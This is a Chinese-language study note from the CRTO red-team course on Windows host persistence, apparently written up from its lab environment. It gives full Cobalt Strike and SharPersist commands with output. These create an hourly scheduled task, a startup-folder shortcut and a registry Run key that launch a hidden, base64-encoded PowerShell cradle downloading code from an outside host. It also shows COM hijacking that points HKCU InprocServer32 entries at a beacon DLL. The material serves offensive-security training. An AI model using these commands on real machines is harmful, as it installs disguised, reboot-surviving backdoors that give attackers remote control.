【CRTO】主机持久化

news/2024/10/6 16:24:40

一、概述二、计划任务三、启动文件夹四、注册表自动运行五、COM劫持

本章主要是通过计划任务、启动文件夹、注册表自动运行、COM劫持等方法进行持久化后门安装

一、概述

简单来说持久化就是开后门，目标机器重启或者漏洞修补后仍可以继续控制，比如通过钓鱼获得初始权限后，如果没做持久化Beacon 丢失可能就很难再次获得，安装持久化通常需要进行一些配置更改或将后门写入磁盘，一方面持久化具有很高的检测风险，另一方面在长期渗透中非常有用（实际上是必不可少的），因此需要在保持控制和被发现之间进行平衡

持久化可以在用户权限（例如以当前用户身份）或在提权后（例如 SYSTEM）执行。提权后的持久化要求我们首先成为主机上的本地管理员，如何提权将在接下来“特权提升”章节中介绍

常见的用户空间持久化方法包括：

1、HKCU/HKLM 注册表自动运行
2、计划任务
3、启动文件夹

Cobalt Strike 不包含任何专门用于持久化的内置命令

SharPersist是FireEye编写的 Windows 持久化工具包，它用 C# 编写，因此可以通过execute-assembly执行

二、计划任务

Windows 计划任务允许我们创建在预定触发器上执行的“任务”。该触发器可以是一天中的某个时间、用户登录时、计算机空闲时、计算机锁定时，或者上述情况的组合

例如创建一个计划任务，每小时执行一次 PowerShell 有效负载

为了避免在 IEX 命令中处理大量引号，可以将其编码为 base64，然后使用PowerShell 中的-EncodedCommand参数执行它（简写为-enc），注意必须使用 Unicode 编码（而不是 UTF8 或 ASCII），在 PowerShell 中：

PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA

或在Linux中：

ubuntu@DESKTOP-3BSK7NO ~> set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
ubuntu@DESKTOP-3BSK7NO ~> echo -en $str | iconv -t UTF-16LE | base64 -w 0
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA

然后在Cobalt Strike客户端中执行

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly[*] INFO: Adding scheduled task persistence
[*] INFO: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] INFO: Command Args: -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA
[*] INFO: Scheduled Task Name: Updater
[*] INFO: Option: hourly
[+] SUCCESS: Scheduled task added

其中：

-t是所需的持久性技术
-c是需要执行的命令
-a是该命令的任何参数
-n是任务的名称
-m是参数add是添加任务（也可以remove、check和list）
-o是任务频率

登录Workstation 2机器，打开计划任务程序，在左侧菜单中选择任务计划程序库，可以看到新加的任务在主窗口中，可以等待一个小时，或者在该任务上点击右侧菜单中的运行，就会上线一个新的Beacon

三、启动文件夹

用户每次登录时，启动文件夹中的应用程序、文件和快捷方式会自动启动，通常用来引导用户的环境配置（设置壁纸、快捷方式等），可以通过Cobalt Strike客户端中执行

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add[*] INFO: Adding startup folder persistence
[*] INFO: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] INFO: Command Args: -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA
[*] INFO: File Name: UserEnvSetup
[+] SUCCESS: Startup folder persistence created
[*] INFO: LNK File located at: C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UserEnvSetup.lnk
[*] INFO: SHA256 Hash of LNK file: B34647F8D8B7CE28C1F0DA3FF444D9B7244C41370B88061472933B2607A169BC

其中：

-f是要保存的文件名

登录Workstation 2 查看 C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ 中文件，注销后重新登录看效果

四、注册表自动运行

HKCU 和 HKLM 中的 AutoRun 值允许应用程序在开机时启动，通常这些值用于启动本机和第三方应用程序，例如软件更新程序、下载助手、驱动程序实用程序等

beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add[*] INFO: Adding registry persistence
[*] INFO: Command: C:\ProgramData\Updater.exe
[*] INFO: Command Args: /q /n
[*] INFO: Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[*] INFO: Registry Value: Updater
[*] INFO: Option: 
[+] SUCCESS: Registry persistence added

其中：

-k是需要修改的注册表项
-v是要创建的注册表项的名称

重启后测试效果

注意：

1、HKLM 自动运行并不是以 SYSTEM 身份执行有效负载

2、只有当配置单元的所有者登录到计算机时，HKCU 自动运行才会触发

3、当任何用户登录到计算机时，HKLM 自动运行都会触发，但它仍以用户帐户权限运行

五、COM劫持

尽量不要劫持正在使用的 COM 对象，这会破坏依赖它们的应用程序运行，可能暴露攻击行为

尽量找试图加载实际上不存在的对象（所谓的“废弃”键）的应用程序，这是一种更安全的策略

可以使用进程监视器（Sysinternals Suite工具之一），它可以显示实时文件系统、注册表和进程活动，在查找不同类型的特权升级方面非常有用，首先在自己的机器上寻找劫持，然后在实际目标上利用它们，在Attacker Desktop虚拟机上启动procmon64.exe

筛选如下操作：

1、RegOpenKey 操作
2、结果为NAME NOT FOUND
3、并且路径以InprocServer32结尾

为了加快收集速度，可以进行一些常规操作，比如单击任意内容、进入 Windows 菜单、启动应用程序等。大约一分钟有大约 500 个事件，其中大部分来自 Explorer，一些来自第三方软件，其他来自 OS 组件

需要注意的是特定 CLSID 的加载次数，如果劫持了一个每隔几秒加载一次的 CLSID，那要付出很大代价了

所以最好去寻找一个加载频率不高或在打开常用应用程序（Word、Excel、Outlook 等）时加载的 CLSID

通过滚动浏览，发现一个 CLSID 正在由C:\Windows\System32\DllHost.exe加载

HKCU\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32

使用 PowerShell 命令检测该条目确实存在于 HKLM 中，但不存在于 HKCU 中

PS C:\Users\Attacker> Get-Item -Path "HKLM:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"Name                           Property
----                           --------
InprocServer32                 (default)      : C:\Windows\System32\thumbcache.dllThreadingModel : Apartment

PS C:\Users\Attacker> Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32' because it does not exist.

利用此漏洞，可在 HKCU 中创建必要的注册表项，并将其指向 Beacon DLL，比如直接将其指向C:\Payloads\http_x64.dll

PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll"
PS C:\Users\Attacker> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

当DllHost.exe加载此 COM 条目时，一个 Beacon上线

要清理 COM 劫持只需从 HKCU 中删除注册表项并删除 DLL即可

另一个寻找可劫持 COM 组件的方法是计划任务程序，许多默认的 Windows 任务实际上使用自定义触发器来调用 COM 对象，而不是直接在磁盘上执行二进制文件，由于它们是通过计划任务程序执行的，因此更容易预测它们何时会被触发。我们可以使用以下 PowerShell 来查找兼容的任务

$Tasks = Get-ScheduledTaskforeach ($Task in $Tasks)
{if ($Task.Actions.ClassId -ne $null){if ($Task.Triggers.Enabled -eq $true){if ($Task.Principal.GroupId -eq "Users"){Write-Host "Task Name: " $Task.TaskNameWrite-Host "Task Path: " $Task.TaskPathWrite-Host "CLSID: " $Task.Actions.ClassIdWrite-Host}}}
}

这个脚本很简单，输出结果如下：

Task Name:  SystemSoundsService
Task Path:  \Microsoft\Windows\Multimedia\
CLSID:  {2DEA658F-54C1-4227-AF9B-260AB5FC3543}Task Name:  MsCtfMonitor
Task Path:  \Microsoft\Windows\TextServicesFramework\
CLSID:  {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}Task Name:  Calibration Loader
Task Path:  \Microsoft\Windows\WindowsColorSystem\
CLSID:  {B210D694-C8DF-490D-9576-9E20CDBC20BD}Task Name:  CacheTask
Task Path:  \Microsoft\Windows\Wininet\
CLSID:  {0358B920-0AC7-461F-98F4-58E32CD89148}

在计划任务程序中查看MsCtfMonitor 任务，可以看到它是在任何用户登录时触发，可以起到有效的重启持久化作用

在HKEY_CLASSES_ROOT\CLSID中查找 {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} 项

PS C:\> Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\MsCtfMonitor.dllThreadingModel : Both

可以看到InprocServer32，并且可以验证它在 HKLM 而不是 HKCU 中

PS C:\> Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSizeName                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.

现在只需在 HKCU 中添加一个指向我们的 DLL 的重复条目（如上所示），每次用户登录时都会加载

#参考🔗
CRTO的介绍
https://mp.weixin.qq.com/s/j0gXVJCrAl6MsC9nZpPvbg